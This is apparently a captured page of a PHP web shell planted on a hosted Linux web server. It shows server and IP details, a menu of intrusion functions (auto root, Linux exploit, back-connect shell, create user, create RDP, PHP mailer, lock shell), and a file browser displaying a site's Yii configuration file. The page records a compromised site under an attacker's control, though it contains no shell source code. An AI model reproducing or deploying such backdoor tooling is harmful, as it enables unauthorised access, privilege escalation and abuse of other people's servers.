Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.216.88
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
letaweb /
install /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
main.php
1.17
KB
-rw----r--
params.php
7.18
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : main.php
<?php return array( 'timeZone' => 'Asia/Calcutta', 'basePath' => dirname(__FILE__).DIRECTORY_SEPARATOR.'..', 'name' => 'SiteBuilder Instalation', // preloading 'log' component 'preload' => array('log'), // autoloading model and component classes 'import' => array( 'application.models.*', 'application.components.*', ), 'defaultController' => 'site', // application components 'components' => array( 'urlManager' => array( 'urlFormat' => 'path', 'rules' => array( ), ), 'request' => array( 'enableCsrfValidation' => true, 'enableCookieValidation' => true, ), 'log' => array( 'class' => 'CLogRouter', 'routes' => array( array( 'class' => 'CFileLogRoute', 'levels' => 'error, warning', ), // uncomment the following to show log messages on web pages /* array( 'class'=>'CWebLogRoute', ), */ ), ), ), );
Close